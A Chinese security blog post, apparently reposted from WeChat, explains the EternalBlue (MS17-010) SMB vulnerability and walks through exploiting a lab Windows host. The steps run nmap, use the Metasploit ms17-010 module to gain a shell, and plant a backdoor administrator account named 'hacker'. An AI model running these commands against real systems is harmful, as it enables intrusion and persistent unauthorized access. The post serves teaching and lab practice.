​永恒之蓝漏洞原理及漏洞复现

admin 2024年11月27日23:05:15评论16 views字数 1394阅读4分38秒阅读模式

摘要

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

上文提到了SMB协议

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

渗透测试前期准备

攻击机:192.168.71.235(kali系统)
靶机:192.168.71.33(windows系统,未打永恒之蓝的补丁)
原理

永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

漏洞复现

本漏洞需要用到kali自带的Metasploit(简称msf)渗透工具

首先利用kali中的nmap扫描工具扫描目标网站开放的端口

nmap 192.168.71.33 -p 0-65535

​永恒之蓝漏洞原理及漏洞复现

发现靶机开放了很多端口,这里我们需要利用靶机开放的445端口进行后续渗透

在kali攻击机中启动msf渗透工具

msfconsole

​永恒之蓝漏洞原理及漏洞复现

永恒之蓝的漏洞编号是ms17-010

这里我们利用msf搜索漏洞编号查看可用漏洞

search ms17-010

​永恒之蓝漏洞原理及漏洞复现

这里选择一个编号1的漏洞

use 1    然后show options一下查看需要配置的选项

​永恒之蓝漏洞原理及漏洞复现

这里我们设置一下靶机的ip以及端口

set rhost 192.168.71.33   set rport 445

配置完成后输入run开始攻击

​永恒之蓝漏洞原理及漏洞复现

这里如果攻击不成功的话可以尝试下别的漏洞,我们现在是直接一次成功进入了。

sysinfo 查看系统信息

​永恒之蓝漏洞原理及漏洞复现

scrennshot 捕获靶机屏幕

​永恒之蓝漏洞原理及漏洞复现

​永恒之蓝漏洞原理及漏洞复现

最后可以输入shell建立交互的shell

​永恒之蓝漏洞原理及漏洞复现

进行后门植入(创建新的管理员账户)

net user hacker 123456 /add    //在靶机上创建一个hacker的用户以便下次访问

net localgroup administrators hacker /add   //将hack加入到靶机的本地管理员组中,以便获得更大权限

​永恒之蓝漏洞原理及漏洞复现

这里由于显示是乱码,我们输入命令产看是否添加成功

net user  查看靶机本地用户

net localgroup administartor  查看靶机本地管理员

​永恒之蓝漏洞原理及漏洞复现

显示hacker用户已经在本地管理员组了

自此,利用永恒之蓝漏洞攻击一台主机就结束了,现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。

今天的分享就到这里,谢谢大家。对渗透测试感兴趣的小伙伴可以关注一下作者。后续作者还会继续分享有用的渗透测试知识。点赞关注不迷路。

原文始发于微信公众号(Man渗透测试):​永恒之蓝漏洞原理及漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日23:05:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​永恒之蓝漏洞原理及漏洞复现https://cn-sec.com/archives/2062579.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息